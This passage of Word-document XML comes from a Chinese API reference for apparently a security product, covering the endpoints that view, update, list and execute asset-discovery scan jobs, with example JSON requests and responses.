        <w:t>": "5fdacbf3edc90d7a292ae9a5"    // 任务id</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="349A4F70" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>返回示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EE63BC1" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "id": "5fdacbf3edc90d7a292ae9a5"    // 被删除的任务id</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="018F1A35" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E"/>
    <w:p w14:paraId="69ED147B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:bookmarkStart w:id="411" w:name="_Toc115166278"/>
      <w:bookmarkStart w:id="412" w:name="任务配置详情"/>
      <w:bookmarkEnd w:id="410"/>
      <w:r>
        <w:t>任务配置详情</w:t>
      </w:r>
      <w:bookmarkEnd w:id="411"/>
    </w:p>
    <w:p w14:paraId="4737997C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>调用接口：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B081771" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>POST /external/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>api</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>assetdiscovery</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/job/</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>find</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="40782B62" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>请求参数：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D252691" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>specId</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "5fdaca26398e682e95d9d3f4"    // 任务id</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75456BF4" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>返回示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="034B6355" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "id": "5fdaca26398e682e95d9d3f4",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "name": "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>my_discovery_job</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "kind": 2,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "values": [],</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>osType</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": 1,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>cronExpression</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "20 20 * * *",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>osDetection</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": true,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ipList</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": [],</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>advanceConfigs</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": [</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        {</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>scanType</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": 2,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>tcpPort</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "80",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>udpPort</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": ""</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        },</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        {</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>scanType</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": 1,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>tcpPort</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": null,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>udpPort</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": null</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    ],</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>maxParallelism</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": null,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>maxRate</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": null,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>taskInterval</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": null,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>cronTaskId</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": 21</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E2E78BC" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E"/>
    <w:p w14:paraId="57DAC1BA" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:bookmarkStart w:id="413" w:name="_Toc115166279"/>
      <w:bookmarkStart w:id="414" w:name="修改扫描任务配置"/>
      <w:bookmarkEnd w:id="412"/>
      <w:r>
        <w:t>修改扫描任务配置</w:t>
      </w:r>
      <w:bookmarkEnd w:id="413"/>
    </w:p>
    <w:p w14:paraId="7E46F008" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>调用接口：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02735F97" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>POST /external/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>api</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>assetdiscovery</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/job/update</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F26E0ED" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>请求参数：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="318F9900" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve"> 先通过 11.3 的 find 接口，查出任务的配置详情，再修改其中某些配置项后提交update</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CED689E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>specId</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "5fdaca26398e682e95d9d3f4",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "name": "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>my_discovery_job_update</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "kind": 2,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "values": [],</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>osDetection</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": true,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>advanceConfigs</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": [</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        {</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>scanType</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": 2,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>tcpPort</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>udpPort</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": ""</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        },</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        {</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>scanType</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": 1</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    ],</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>maxParallelism</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": 30,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>maxRate</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": null,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>taskInterval</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": 6.0,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ipList</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": [],</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>cronExpression</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "10 00 * * *"</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AD36A82" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>返回示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BA9F9D5" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "id": "5fdaca26398e682e95d9d3f4"    // 被修改的任务id</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52E23CEA" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E"/>
    <w:p w14:paraId="4C47C35C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:bookmarkStart w:id="415" w:name="_Toc115166280"/>
      <w:bookmarkStart w:id="416" w:name="查询任务列表"/>
      <w:bookmarkEnd w:id="414"/>
      <w:r>
        <w:t>查询任务列表</w:t>
      </w:r>
      <w:bookmarkEnd w:id="415"/>
    </w:p>
    <w:p w14:paraId="781E7EE7" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>调用接口：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44F765FE" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>POST /external/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>api</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>assetdiscovery</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/job/list</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6210A7B3" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>请求参数：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33FE637B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:t xml:space="preserve"> 筛选项都是选填字段，如果要列出所有的任务则以下字段传空值即可。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="413B3D46" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>"name": "test_7",    // 任务名称，支持模糊查询</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>"</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>scanType</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": [        // 扫描方式</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>1,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>]</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18AA8D3C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>返回示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61F8F25D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "rows": [</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        {</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>specId</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "5fcf34458780f401ba8d63e9",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>jobId</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "5fd9fb70398e682e95d9ccde",  // 执行任务的</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>jobid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "name": "lix_externalapi_test_7",</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">            "progress": 1.0,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "kind": 2,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "values": [],</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>scanType</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": [</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                2,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                1</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            ],</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "status": 2,    // 任务状态 0：待执行 1：执行中 2：执行完成</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>lastScanTime</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": 1608121200638    // 该任务上一次执行时间</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    ],</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "total": 1,    // 总条数</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "charts": {}</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2676C323" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:bookmarkStart w:id="417" w:name="_Toc115166281"/>
      <w:bookmarkStart w:id="418" w:name="执行任务-2"/>
      <w:bookmarkEnd w:id="416"/>
      <w:r>
        <w:t>执行任务</w:t>
      </w:r>
      <w:bookmarkEnd w:id="417"/>
    </w:p>
    <w:p w14:paraId="3528D807" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>调用接口：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AF454DD" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>POST /external/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>api</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>assetdiscovery</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/job/</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>execute</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="0A6897B4" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>请求参数：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="699079C7" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>specId</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "5fcf34458780f401ba8d63e9"</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="669CB9A2" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>返回示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="258A5CBC" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    "id": "5fd9fb70398e682e95d9ccde"    // 返回执行任务的</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>jobid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48146CD1" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E"/>
    <w:p w14:paraId="529F6391" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E">
      <w:pPr>
        <w:pStyle w:val="1"/>
      </w:pPr>
      <w:bookmarkStart w:id="419" w:name="_Toc115166282"/>
      <w:bookmarkStart w:id="420" w:name="微隔离一键隔离接口"/>
      <w:bookmarkEnd w:id="402"/>
      <w:bookmarkEnd w:id="406"/>
      <w:bookmarkEnd w:id="418"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>微隔离一键隔离接口</w:t>
      </w:r>
      <w:bookmarkEnd w:id="419"/>
    </w:p>
    <w:p w14:paraId="47BBA31E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="421" w:name="_Toc115166283"/>
      <w:bookmarkStart w:id="422" w:name="查询一键隔离列表"/>
      <w:r>
        <w:t>查询一键隔离列表</w:t>
      </w:r>
      <w:bookmarkEnd w:id="421"/>
    </w:p>
    <w:p w14:paraId="046D8FE4" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>调用接口：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A35D712" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
